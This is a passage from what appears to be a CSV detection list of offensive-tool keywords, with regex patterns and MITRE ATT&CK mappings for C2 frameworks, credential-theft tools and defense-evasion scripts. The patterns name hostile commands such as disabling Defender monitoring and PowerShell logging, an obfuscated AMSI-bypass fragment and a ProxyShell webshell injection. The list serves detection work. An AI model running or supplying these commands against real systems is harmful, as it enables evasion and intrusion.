"*Set-DomainObject*",".{0,1000}Set\-DomainObject.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11*",".{0,1000}Set\-EtwTraceProvider\s\-Guid\s\'\{A0C1853B\-5C40\-4B15\-8766\-3CF1C58F985A\}\'\s\-AutologgerName\s\'EventLog\-Application\'\s\-Property\s0x11.{0,1000}","offensive_tool_keyword","Set-EtwTraceProvider","disables Microsoft-Windows-PowerShell event logging","T1070.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Seth by SySS GmbH*",".{0,1000}Seth\sby\sSySS\sGmbH.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*seth.py * -j INJECT*",".{0,1000}seth\.py\s.{0,1000}\s\-j\sINJECT.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*Seth-master.zip*",".{0,1000}Seth\-master\.zip.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*SetInitialCheckIn updates the time stamp that the Agent first successfully connected to the Merlin server*",".{0,1000}SetInitialCheckIn\supdates\sthe\stime\sstamp\sthat\sthe\sAgent\sfirst\ssuccessfully\sconnected\sto\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*",".{0,1000}sET\-ItEM\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\'blE\:1q2\'\s\s\+\s\'uZx\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*set-killdate *",".{0,1000}set\-killdate\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Set-Killdate*",".{0,1000}Set\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*setLoaderFlagZero*",".{0,1000}setLoaderFlagZero.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*Set-MacAttribute.ps1*",".{0,1000}Set\-MacAttribute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-MacroSecurityOff *",".{0,1000}Set\-MacroSecurityOff\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Set-MacroSecurityOff.ps1*",".{0,1000}Set\-MacroSecurityOff\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Set-MpPreference -DisableRealtimeMonitoring *true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s.{0,1000}true.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-MpPreference -PUAProtection disable*",".{0,1000}Set\-MpPreference\s\-PUAProtection\sdisable.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*",".{0,1000}Set\-OabVirtualDirectory\s\-ExternalUrl\s\'http.{0,1000}\:\/\/.{0,1000}function\sPage_Load\(\)\{.{0,1000}\}\<\/script\>.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*setoolkit *",".{0,1000}setoolkit\s.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*SetProcessInjection*encryptor.py*",".{0,1000}SetProcessInjection.{0,1000}encryptor\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*SetProcessInjection-main*",".{0,1000}SetProcessInjection\-main.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*set-pushover-applicationtoken*",".{0,1000}set\-pushover\-applicationtoken.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*set-pushover-userkeys*",".{0,1000}set\-pushover\-userkeys.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Set-RemotePSRemoting*",".{0,1000}Set\-RemotePSRemoting.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemotePSRemoting.ps1*",".{0,1000}Set\-RemotePSRemoting\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteShellAccess.ps1*",".{0,1000}Set\-RemoteShellAccess\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-SamAccountPasswordHash * -NTHash *",".{0,1000}Set\-SamAccountPasswordHash\s.{0,1000}\s\-NTHash\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Set-ServiceBinPath*",".{0,1000}Set\-ServiceBinPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set-shellcode-process default*",".{0,1000}set\-shellcode\-process\sdefault.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*setspn -A HTTP/*",".{0,1000}setspn\s\-A\sHTTP\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn -T medin -Q */*",".{0,1000}setspn\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn.exe -T medin -Q */*",".{0,1000}setspn\.exe\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*SetStatusCheckIn updates the last time the Agent successfully communicated with the Merlin server*",".{0,1000}SetStatusCheckIn\supdates\sthe\slast\stime\sthe\sAgent\ssuccessfully\scommunicated\swith\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*setthreadcontext.x64*",".{0,1000}setthreadcontext\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*setthreadcontext.x86*",".{0,1000}setthreadcontext\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Setting up GFlags & SilentProcessExit settings in registry?*",".{0,1000}Setting\sup\sGFlags\s\&\sSilentProcessExit\ssettings\sin\sregistry\?.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*setuid_setgid.py*",".{0,1000}setuid_setgid\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*setup_apfell.sh*",".{0,1000}setup_apfell\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*setup_obfuscate_xor_key*",".{0,1000}setup_obfuscate_xor_key.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*setup_reflective_loader*",".{0,1000}setup_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Set-WMIBackdoor -URL *",".{0,1000}Set\-WMIBackdoor\s\-URL\s.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - 